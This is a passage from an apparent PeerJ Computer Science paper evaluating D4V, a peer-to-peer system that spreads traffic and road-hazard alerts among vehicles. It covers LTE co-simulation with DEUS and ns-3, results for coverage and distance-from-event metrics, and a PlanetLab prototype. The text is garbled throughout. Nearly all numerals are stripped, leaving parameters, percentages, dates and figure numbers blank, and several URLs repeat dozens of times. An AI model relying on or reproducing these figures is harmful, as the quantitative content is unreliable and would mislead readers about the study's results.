it can be concluded that a small number of discovery steps (namely, ) is sufficient, regardless of the value of α, to significantly reduce the pmn. d v performance evaluation the performance evaluation of d v has been mostly carried out by means of an extensive simulative analysis, complemented by a preliminary experimental evaluation of a d v sys- tem prototype deployed on the planetlab global testbed. while a thorough performance evaluation of the proposed d v system would require a wide range of (resource intensive) on-field experiments, we rely on the fact that discrete event simulations are deemed useful to provide a proof-of-concept in this domain (stojmenovic, ). in particular, we focus on a g wireless communication scenario, based on the long-term evolution (lte) technology (cox, ). simulation methodology deus is an open source, java-based, general-purpose discrete event simulation tool, which is particularly suitable for the application-level analysis of distributed systems with thousands of nodes, characterized by a high level of churn (node joins and departures) and reconfiguration of connections among nodes (amoretti, agosti & zanichelli, ). on the other hand, ns- is a widely known open source tool for the discrete event simulation of internet systems (focusing on low layers of the protocol stack, e.g., mac and physical), which relies on high-quality contributions of the community to develop new models, to debug or to maintain existing ones, and to share results (ns- development team). in amoretti et al. ( ), we describe a sound methodology to integrate deus (amoretti, agosti & zanichelli, ) and ns- (ns- development team), leading picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. to a more accurate performance evaluation of large-scale mobile and distributed systems. the main steps of the co-simulation methodology proposed in amoretti et al. ( ) can be summarized as follows: . given a complex system to be simulated, identify the main sub-system types, each one being characterized by specific networking parameters; . with ns- : create detailed simulation models of the sub-systems (i.e., sub-models) and measure their characteristic transmission delays, taking into account both message payloads and proper headers; . with deus: simulate the whole distributed system, with refined scheduling of communication events, taking into account the transmission delays computed at step . regarding step , we have used ns- ’s lena lte-epc package, by modifying the c + + we used the version released the rd of january (lte-epc network simulator). class which creates the logs for the radio link control (rlc) protocol. the modified class logs a discretized probability density function (pdf) of the rlc packet delay. the latter is then used to generate realistic packet delays in the deus-based simulations, using the well-known inversion method (papoulis, ). for practical implementation purposes, the discretized pdf of the downlink rlc packet delay is approximated by a piecewise constant function, whose numerical inversion is straightforward and computationally inexpensive. we have simulated a d v-based application deployed across the city of parma, considering a number of vehicles that move over km of realistic paths generated using the google maps api. each simulated vehicle selects a different path and starts moving over it. using the features provided by the google maps api, we have created a simple html & javascript control page, which allows to monitor the time progression of the simulated system, where any peer can be selected to view its neighborhood: a few video demos are publicly available (distributed system group). the simulation covers h of d v system life ( virtual time units) with sss, virtual paths with bad road surface (due to either ice, water, snow, or pothole), accident events characterized by a poisson arrival process, and with different message types to disseminate information about sensed traffic data. simulations with deus have been repeated with different seeds for the random number generator, to obtain a narrow i confidence interval. the performance results reported in figs. – are obtained by averaging over the simulation runs, considering the whole set of simulated peers. the considered simulation set-up is characterized by the dgt configuration which gives the best performance in urban scenarios (according to a previous study (picone, amoretti & zanichelli, a)), which is summarized in the following, using the dgt description formalism defined in section ‘distributed geographic table’. each peer has: k = gbs, with the same thickness r = . km; a limiting number of discovered peers equal to ; a region of interest of . km ; an adaptive discovery period ranging from . min to min, depending on the number of new discovered peers during each iteration step. the discovery period of a peer is an increasing function of the degree of knowledge of its neighborhood, corresponding to the decrement of the number of new discovered peers in the same area of interest. picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure bird’s-eye view of the simulated scenario. the transmission delay of a dgt packet has been computed by simulating with ns- the sub-system illustrated in fig. (averaging over simulation runs). to match the previously described dgt configuration (i.e., dgt peers having gbs that cover a circular region of interest with radius equal to km), we consider a square region having side length l = km, with a grid of nr = roads ( in the n-s direction, and in the w-e direction) and vehicles running over them (with linear density δ). the total amount of dgt user equipments (ues) can be expressed as n = nrδl. parallel roads are spaced by l/ = . km. in the map, there are large buildings with square footprint, and seven floor-tall. within each building, there are nv/ other randomly located ues, where nv is the total number of ues in all buildings. the path loss model is ns ::buildingspropagationlossmodel. on top of each building, exactly in the middle, there is an evolved nodeb (enb), i.e., a base station which serves a subset of the n + nv ues. the configuration of the such a dense deployment of enbs may appear to be quite optimistic, but it represents a realistic scenario for medium-term ue systems. enbs includes fdd paired spectrum, with resource blocks (rbs) for the uplink (which corresponds to a nominal transmission rate of mbps) and the same for the downlink—this is coherent with currently deployed lte systems. dgt ues use udp to send four types of dgt packets to each other. the first type, called descriptor ( bytes), is for neighborhood consistency maintenance purposes. the second type of packet, the lookup request ( bytes), is used to search for remote peers placed around a specified picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure pdfs of the uplink (a) and downlink (b) delays for dgt packets. location. the third packet type is the lookup response ( bytes), which is sent by a dgt peer as a reply to a lookup request, if the peer owns the searched resource or information. finally, the fourth type of packet is related to traffic information ( bytes). all packet types have also a byte header. we set an inter-packet interval of ms for all types of dgt messages. thus, the maximum and minimum rates are, respectively, × ≃ kb/s and × = . kb/s. in a dynamic dgt scenario (the one simulated with deus), packets are not sent periodically—descriptors are sent only every ϵ meters; lookup requests (as well as lookup responses) are sent only when necessary; traffic information messages are sent only when something “interesting” can be communicated to the other peers (for example, a traffic jam or an incident). in order to simulate the presence of non-dgt traffic over lte networks, we also include nv = other ues, transmitting and receiving voip packets (using udp) with a remote host located in the internet. these packets have a byte header and a byte payload, with inter-packet interval set to ms (the amr . kbps codec is considered). the pdf of the resulting uplink delay, shown in fig. a, can be approximated as a dirac delta function. the pdf of the downlink delay, shown in fig. b, can instead be approximated with a piecewise constant function, with three levels. such delay profiles scale from small scenarios to larger ones, as they refer to intra-gb communications only. a dgt message can be propagated across the whole city, from one peer to another, relayed by intermediate peers. each message propagation would be affected only by the data traffic within the gb of the forwarding peer—where the obtained delay profiles apply. parameters for large-scale analysis the following set of performance metrics has been considered in the deus-based simulations of the d v system: • cp (dimensionless): estimated coverage percentage of d v messages (trafficinfor- mation and sensordata) at a certain time of the simulation. it is evaluated as the ratio picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table parameters affecting the performance of a d v system. symbol description values k number of gbs r thickness of each gb . km ϵ position update threshold [ . ; ] km er event range [ ; ] km δ peer spatial density [ ; ] veh/km p packet loss percentage [ ; ] between the number of peers that actually received a specific message and the number of those which should have received it. • pvtj (dimensionless): average percentage of vehicles (with respect to the total number of vehicles) involved in a traffic jam. • dfe (dimension: (km)): the distance from event is the average distance from a traffic jam of interested vehicles which have not received the information about the traffic jam yet. the higher the dfe, the higher the security margin (and related time) to receive the message. • dr (dimension: (kb/s/peer)): average data rate per peer. table summarizes the values of the main parameters that affect the performance of the d v system. impact of ϵ the first step of the simulation-based d v evaluation aims at analyzing the impact of the value of the threshold ϵ, considering two representative values for the peer spatial density δ (namely, veh/km and veh/km), an event range er equal to km, and a packet loss percentage p = %. as defined in section ‘distributed geographic table’, ϵ represents the minimum displacement threshold considered by a peer to notify its geographic position update to the peers in its neighborhood. our performance analysis aims at evaluating the effects of the variation of the update frequency on the information dissemination and, consequently, on the system performance. in fig. , the impact of ϵ on the considered performance metrics is evaluated. in particular, fig. a, where the cp is investigated, shows that traffic information messages are highly distributed to active peers in the region of interest. as expected, a higher peer spatial density contributes to increase knowledge sharing, thus increasing the cp. in fig. b, the pvtj is investigated, showing the inherent robustness of d v. in fact, even in the presence of a reduced update frequency, d v can properly distribute traffic information, leaving only a small percentage of drivers in traffic jams. we remark that even with lower peer spatial densities (such as δ = peers/km) the performance would not change, provided that ϵ is properly configured (as will be shown in fig. b, discussed below). the effectiveness of the d v approach is further shown by the dfe results in fig. c. in particular, the dfe remains approximatively constant and very close to the dissemination range value of km, confirming that peers that do not picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure simulation results for different values of the position update threshold. receive a traffic message are those located very far from the traffic event, thus still having a high probability of receiving the alert on time. this analysis suggests that vehicles stuck in traffic jams are the ones really close to the traffic jam and with not enough time to react and change direction. from the results in fig. d, it can be observed that a finer position update rate (i.e., a lower value of ϵ) and/or a higher peer spatial density increase dr. impact of event range in fig. , the same performance metrics of fig. are investigated as functions of er, with ϵ = km and p = %. the results in figs. a and b show clearly that a short er (as small as km) affects the message distribution process, due to a lower margin between the traffic jam and the drivers. in this situation, peers may receive alert messages when they are too close to dangerous situations, thus becoming involved in the queue. in particular, we remark how a lower vehicle density worsens such a phenomenon due to the smaller number of peers available in their knowledge database which can redistribute traffic condition event messages. at the same time, it can be observed how there is no significant gap using er values larger than km for both peer density curves. in fig. c, the dfe value for the considered configurations is shown as a function of the range. for comparison, the optimal distance from the event is also shown. the latter coincides with the value of the event range as, ideally, the minimum distance of peers which did not receive the traffic information message yet is clearly the range of interest. the obtained results show that picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure results for different values of the dissemination range. within a km event range, the dfe remains very close to the optimal bound, while it increasingly separates from it for higher er values. this is quite reasonable, as the area to be covered increases with the square of the event range. hence, drivers who do not receive the alert for a specific event are in any case sufficiently far from it and will receive the alert with enough time to react. finally, an extended er corresponds to an increased notification area and, consequently, to a larger number of interested drivers that may be contacted. however, as shown in fig. d, this slightly affects the amount of exchanged messages. impact of peer spatial density the third stage of the simulative analysis aims at evaluating the impact, on system performance, of the peer spatial density. in all considered cases, ϵ = km, er = km, and p = %. the scenario is characterized by an initially growing number of active vehicles, followed by a stable phase without new joins or disconnections. the results in fig. a confirm that the proposed solution copes with different peer spatial densities with no performance degradation, keeping the cp significantly high (between % and %) even in the case of very low density ( peers/km), which could be quite critical for vanet-based applications. we recall that, if a mobile peer finds itself in a desert region, it will still be able to fill its external gb with remote peers, by requesting their contacts to the bootstrap node (described in section ‘distributed geographic table’), as if it is joining again the network with a new geographic location. such a distributed knowledge picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure simulation results for different peer densities. provides appropriate support to efficiently disseminate messages about traffic jams or sensed data. as already observed in section ‘impact of event range’, the results in fig. c show that an increasing number of active peers maintains the dfe high and close to the dissemination range. this results in an accurate dissemination of traffic information messages that allows drivers to receive alert information on time, still sufficiently far from the dangerous location. in fig. b, the percentages of vehicles blocked in a traffic jam, with and without d v content dissemination, are directly compared. these results confirm that the d v approach drastically reduces the number of involved vehicles that would otherwise grow significantly for increasing density. in fig. d, the average data traffic per peer (dimension: (kb/s/peer)), required to maintain the dgt overlay and disseminate traffic information messages to other active neighbors, is shown as a function of the peer spatial density. since udp is the used transport protocol, there are no retransmissions in the presence of lost packets—more details can be found in picone, amoretti & zanichelli ( b). here, we investigate the average bandwidth—estimated from simulative results, corrected considering the cost of headers—consumed in the best case (when the transmitted message is much longer than the ip header) and in the worst case (when the transmitted message has a size comparable to that of the ip header, e.g., a location update, which contains only a peer descriptor and picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. a location). even if there is an unavoidable growth for increasing peer spatial densities, the amount of data exchanged by each peer remains limited. this behavior is associated with the fact, described in section “impact of event range”, that the d v system uses an opportunistic content dissemination strategy. in fact, this approach tries to minimize the amount of transmitted packets, by forwarding them only to interested users, trying, at the same time, to reduce the number of duplicated messages. the considered values of peer spatial density are veh/km, veh/km, and veh/km. higher values would be neither realistic nor interesting, as they would mean that all vehicles on the roads run the dgt. a similar analysis has been carried out by heep et al. ( ), regarding overdrive—the most recent location-aware p p overlay scheme for smart traffic applications (as anticipated in section ‘related work’). their geographic unicast message success rate (gumsr) can be compared to our cp. overdrive is characterized by gumsr between % and %, with dr > kb/s/peer. the d v shows a cp > % with dr < (kb/s/peer). in overdrive, the bandwidth consumption depends on the flooding rate. in d v, message dissemination is mostly affected by peer spatial density (for which gbs could be more or less filled) and by the dissemination range. as shown in section ‘impact of event range’, even large variations of the latter parameter keep dr significantly below (kb/s). moreover, in our analysis, we investigate the dfe of the -cp % of the peers that do not receive the notifications. the higher the dfe, the higher the distance between the event’s location and the peers that have not been notified, the higher the security margin. to summarize, in order to have a comprehensive behavior and performance evaluation of location-aware p p overlay schemes, cp and dfe must be jointly investigated. robustness in fig. , the robustness is investigated by analyzing the impact of the packet loss percentage p on cp, pvtj, dfe, and dr. in all cases, ϵ = km and er = km. in the current simulator, there is no recovery procedure to verify whether a transmitted message has been correctly delivered and, if necessary, to retransmit it. this needs to be taken into account to properly interpret the obtained results, in particular for the dissemination of traffic information messages and the global robustness of the dgt approach. in fig. a, the global cp is shown as a function of the packet loss percentage, confirming that peers maintain a detailed knowledge of traffic events (on average more than %) in the first gb. in fig. b, the pvtj appears as a slightly increasing function of p, given that some peers may not receive alerts on the dangerous event and could be stuck in a queue. the distributed knowledge provided and maintained by the dgt allows to inform a large number of drivers, thus keeping the number of queued vehicles really small. the robustness of d v is also confirmed by results in fig. c, showing that the peers that do not receive traffic information messages related to a dangerous event are considerably distant from the event’s location. moreover, the dfe is almost independent of p. finally, in fig. d the dr is shown as a function of p. it can be observed that the dr is unavoidably lower than in the other scenarios, due to the lack of a recovery procedure for lost packets. picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure simulation results for different packet loss percentages. vehicle speed analysis finally, considering the behavioral model of a driver in proximity of a road stretch with a bad surface condition, that we have introduced in section ‘mobility model’, in fig. we show the monitored speed for five virtual tracks with bad surface conditions for all drivers (including both the informed ones and those not informed). the observed results clearly show that a decreased speed is measured near the critical location (at distance zero), along with an increasing speed while moving away from it. owing to this behavior, it can be concluded that the deployment of d v would probably reduce the risk of accidents and nuisances, on account of the d v-based information sharing among drivers, especially those approaching the dangerous event. experimental evaluation the extensive simulative analysis of the dgt gave us valuable feedback for the develop- ment of a dgt java library and a first prototype of the d v traffic information system. the dgt library implements the core functionalities such as neighborhood and management, as well as gb maintenance. a d v application layer uses such features to implement the content dissemination algorithm and the user interface to collect inputs related to a specific traffic event, and to show approaching dangerous situations. the development of the dgt library is based on the open source peer-to-peer middleware picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure average of driver speed near road points with bad surface condition. called sip peer (sip peer), which provides sip-based primitives for the implementation of any peer-to-peer overlay scheme and application. in order to properly measure the network performance, to understand if the results of the simulation analysis are confirmed in a real distributed environment, we deployed d v nodes on planetlab, which is a global research network that supports the development of https://www.planet-lab.org/ new network services. planetlab currently consists of about , nodes at sites (the university of parma contributes with nodes). in detail, we deployed d v peers on different planetlab servers, located in different countries. every s, each node logs all the required information (e.g., geographic location, exchanged kbytes, received and sent messages) to analyze the behavior of the node. at the end of each experiment, a dedicated tool parses all available log files, to build a time line of the experiment made by steps of s containing all the required statistics for the performance evaluation. all experiments have been run several times. figure a illustrates the coverage percentage. the generation of traffic messages starts s after the activation of a dedicated d v event-generator node, in order to give them sufficient time to build the dgt overlay. results show that the average value of cp is very high (close to %), and in particular significantly near the average value of our simulations (≃ %). the cp curve shows that when new messages are generated, the coverage percentage goes lightly down to lower values but after one or two time line steps ( / s) recovers to a high coverage percentage, thus confirming that the dissemination process and the neighborhood knowledge allow to efficiently distribute messages. figure b shows the dfe of the planetlab deployment, considering a km interest range ffor disseminated messages. the graph confirms that vehicles that did not receive the message are on average significantly far from the dangerous event, and with an picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ https://www.planet-lab.org/ http://dx.doi.org/ . /peerj-cs. figure planetlab experimental results: (a) coverage percentage; (b) distance from event (dfe). high probability have a sufficient margin to receive the message before approaching the potentially dangerous location, by changing their direction to reach their destination using a different route, or just adapting their vehicle speed (for example, in proximity of a portion of damaged road surface). conclusions in this paper, we have introduced d v, a scalable system for opportunistic dissemination of information gathered through commercial smartphones, from vehicle sensors and driver inputs. d v relies on the potential of dgt, a p p overlay network which unifies the concepts of geographical and virtual neighborhoods. two key results have been presented. the first one is given by the derivation of an analytical framework to characterize the discovery procedure of the dgt proactive neighbor localization protocol. the outcome, namely the average number of newly discovered nodes at each step, can provide useful guidelines for the design of a dgt-based application to determine how to appropriately set the main system parameters in order to guarantee a desired missing node percentage. the second result is given by the design of an effective and efficient opportunistic dissemination strategy which relies on the dgt to distribute vehicular information and sensed data to interested drivers. simulation results show that the proposed d v system guarantees a high vehicular notification coverage, over a wide range of system parameters’ values, whilst generating limited control data traffic and coping reasonably well with significant packet losses. hence, we are confident that d v could be effectively used on the road to reduce the number of drivers involved in traffic jams, as well as to disseminate alert messages about potentially dangerous road stretches, thus allowing drivers to reduce risks and nuisances along their paths. further work will investigate the optimization of opportunistic message dissemination at the minimum d v message traffic load (e.g., by estimating vehicle trajectories). moreover, we will investigate a global communication model which takes into account picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. both user mobility and available wireless network (wi-fi and cellular) coverage: this will likely improve the flexibility, accuracy, and reliability of d v. additional information and declarations funding the work of g ferrari was partially supported under the one-year project “cross-network effective traffic alerts dissemination” (x-netad, eureka label e! , – ), sponsored by the ministry of foreign affairs (italy) and the israeli industry center for r&d (israel) under the “israel-italy joint innovation program for industrial, scientific and technological cooperation in r&d.” the work of marco picone is supported by guglielmo srl, reggio emilia, italy. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: ministry of foreign affairs. the israeli industry center for r&d (israel). guglielmo srl, reggio emilia, italy. competing interests the authors declare there are no competing interests. author contributions • marco picone conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work. • michele amoretti conceived and designed the experiments, analyzed the data, con- tributed reagents/materials/analysis tools, wrote the paper, performed the computation work. • gianluigi ferrari and francesco zanichelli conceived and designed the experiments, reviewed drafts of the paper. data availability the following information was supplied regarding the deposition of related data: https://github.com/dsg-unipr/deus/. references aberer k, alima lo, ghodsi a, girdzijauskas s, haridi s, hauswirth m. . the essence of p p: a reference architecture for overlay networks. in: th ieee int.’l conference on peer-to-peer computing (p p ). konstanz, germany. amoretti m. . a survey of peer-to-peer overlay schemes: effectiveness, efficiency and security. recent patents on computer science ( ): – doi . / . picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ https://github.com/dsg-unipr/deus/ http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. amoretti m, agosti m, zanichelli f. . deus: a discrete event universal simulator. in: nd icst/acm int.’l conference on simulation tools and techniques (simutools ). roma, italy. amoretti m, picone m, zanichelli f, ferrari g. . simulating mobile and distributed systems with deus and ns- . in: international conference on high performance computing and simulation . helsinki, finland. bronsted j, kristensen lm. . specification and performance evaluation of two zone dissemination protocols for vehicular ad-hoc networks. in: th annual simulation symposium, huntsville. alabama, usa. buchanan m. . nexus: small worlds and the groundbreaking theory of networks. new york: w. w. norton & company. burke j, estrin d, hansen m, parker a, ramanathan n, reddy s, srivastava mb. . participatory sensing. in: wsw . boulder, colorado, usa. caliskan m, graupner d, mauve m. . decentralized discovery of free parking places. in: rd int.’l workshop on vehicular ad hoc networks. los angeles, california, usa. cox c. . an introduction to lte: lte, lte-advanced, sae and g mobile communications. hoboken: wiley. dietzel s, petit j, kargl f, scheuermann b. . in-network aggregation for vehicular ad hoc networks. ieee communications surveys & tutorials ( ): – doi . /comst. . . distributed system group. d v videos. available at http://dsg.ce.unipr.it/d v. du l, dao h. . information dissemination delay in vehicle-to-vehicle communication networks in a traffic stream. ieee transactions on intelligent transportation systems ( ): – doi . /tits. . . emule project. homepage. available at http://www.emule-project.net. fewell mp. . area of common overlap of three circles. tech. report of the department of defence, australian government. fiore m, harri j, filali f, bonnet f. . vehicular mobility simulation with vanetmobisim. simulation ( ): – doi . / . fujiki t, kirimura m, umedu t, higashino t. . efficient acquisition of local traffic information using inter-vehicle communication with queries. in: th int.’l ieee conference on intelligent transportation systems (itcs ’ ). seattle, washington, usa. gerla m, kleinrock l. . vehicular networks and the future of the mobile internet. computer networks ( ): – doi . /j.comnet. . . . granovetter m. . the strength of weak ties. american journal of sociology ( ): – doi . / . hadaller d, keshav s, brecht t, agarwal s. . vehicular opportunistic communication under the microscope. in: int.’l conference on mobile systems, applications and services (mobisys). san juan, puerto rico. han m, moon s, lee y, jang k, lee d. . evaluation of voip quality over wibro. in: passive and active measurement conference (pam). cleveland, ohio, usa. harri j, filali f, bonnet c. . a framework for mobility models generation and its application to inter-vehicular networks. in: rd ieee int.’l workshop on mobility management and wireless access. cologne, germany. hartenstein h, laberteaux k. . vanet vehicular applications and inter-networking technologies. hoboken: wiley. picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /comst. . http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dx.doi.org/ . /tits. . http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://dx.doi.org/ . / http://dx.doi.org/ . /j.comnet. . . http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. heep b, florian m, volz j, baumgart i. . overdrive: an overlay-based geocast service for smart traffic applications. in: th annual conference on wireless on-demand network systems and services (wons). banff, alberta, canada. hull b, bychkovsky v, zhang y, chen k, goraczko m, miu a, shih e, balakrishnan h, madden s. . cartel: a distributed mobile sensor computing system. in: th acm conference on embedded networked sensor systems (sensys). boulder, colorado, usa. jedrzej r, scheuermann b, koegel m, mauve m. . peertis: a peer-to-peer traffic information system. in: int.’l conference on mobile computing and networking. beijing, china. jiang d, taliwal v, meier a, holfelder w, herrtwich r. . design of . ghz dsrc-based vehicular safety communication. ieee wireless communications ( ): – doi . /wc-m. . . krauss s, wagner p, gawron c. . metastable states in a microscopic model of traffic flow. physical review e : – doi . /physreve. . . lee u, gerla m. . a survey of urban vehicular sensing platforms. computer networks ( ): – doi . /j.comnet. . . . lee u, magistretti e, zhou b, gerla m, bellavista p, corradi a. . mobeyes: smart mobs for urban monitoring with vehicular sensor networks. ieee wireless communications ( ): – doi . /wc-m. . . leontiadis i, mascolo c. . opportunistic spatio-temporal dissemination system for vehicular networks. in: int.’l conference on mobile systems, applications and services (mobisys). san juan, puerto rico. longley pa, goodchild mf, maguire dj, rhind dw. . geographic information systems and science. hoboken: wiley. lte-epc network simulator (lena). release m . available at http://mailman.isi.edu/pipermail/ ns-developers/ -january/ .html. mahmoud a, olariu s. . zipper: a zero-infrastructure peer-to-peer system for vanet. in: int.’l workshop on modeling analysis and simulation of wireless and mobile systems (mswim). chania, crete island, greece. maymounkov p, mazieres d. . kademlia: a peer-to-peer information system based on the xor metric. in: st international workshop on peer-to-peer systems. meneguette ri, maia g, madeira erm, loureiro aaf. . autonomic data dissemination in highway vehicular ad hoc networks with diverse traffic conditions. in: ieee symposium on computers and communication (iscc). madeira, portugal. mohan p, padmanabhan v, ramjee r. . nericell: rich monitoring of road and traffic conditions using mobile smartphones. in: th acm conference on embedded networked sensor systems (sensys). raleigh, north carolina, usa. mun m, reddy s, shilton k, yau n, boda p, burke j, estrin d, hansen m, howard e, west r. . peir, the personal environmental impact report, as a platform for participatory sensing systems research. in: int.’l conference on mobile systems, applications and services (mobisys). krakow, poland. ns- development team. ns- official homepage. available at http://www.nsnam.org. papoulis a. . probability, random variables, and stochastic processes. milano: mcgraw hill. picone m, amoretti m, zanichelli f. a. proactive neighbor localization based on distributed geographic table. international journal of pervasive computing and communications ( ): – doi . / . picone m, amoretti m, zanichelli f. b. evaluating the robustness of the dgt approach picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /wc-m. . http://dx.doi.org/ . /physreve. . http://dx.doi.org/ . /j.comnet. . . http://dx.doi.org/ . /wc-m. . http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html 